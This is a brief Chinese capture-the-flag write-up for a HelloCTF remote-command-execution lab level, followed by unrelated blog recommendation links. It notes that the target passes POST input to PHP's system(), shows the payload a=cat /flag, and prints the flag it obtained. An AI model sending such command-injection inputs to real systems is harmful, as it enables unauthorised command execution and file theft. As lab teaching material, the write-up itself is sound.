HelloCTF [RCE-labs] Level 3 - 命令执行

开启靶场,打开链接:

这关代码跟level 1的区别是eval(_POST\['a'\]);变成了system(_POST['a']);

system() 函数会通过软连接执行你输入的系统命令

POST传参:a=cat /flag

成功得到flag:

NSSCTF{b10b3661-b382-467e-86be-4c374fdd3e5f}

相关推荐
骑猪兜风2337 小时前
Agent 支付基础设施全景:从 HTTP 402 到机器对机器经济
经验分享
雾岛听蓝8 小时前
Linux线程基础
linux·开发语言·经验分享
2401_827499999 小时前
python项目实战10-网络机器人03
开发语言·python·php
a11177610 小时前
网络安全检查表 docx 附文件
网络·安全·web安全
达不溜的日记10 小时前
CAN总线网络传输层CanTp详解
网络·stm32·嵌入式硬件·网络协议·网络安全·信息与通信·信号处理
xinhuanjieyi11 小时前
php setplayersjson实现类型转换和文件锁定机制应对高并发
android·开发语言·php
dozenyaoyida11 小时前
嵌入式设计模式之策略模式(1)
经验分享·设计模式·策略模式
藤原千花的败北11 小时前
云存储AccessKey泄露漏洞(oss AK/SK)
网络安全
xixixi7777712 小时前
从5G标准到6G前沿:Polar码的技术演进与未来之路
开发语言·人工智能·5g·大模型·php·通信·polar码
Crazy CodeCrafter12 小时前
服装实体店现在还适合转电商吗?
大数据·运维·人工智能·经验分享·自动化·开源软件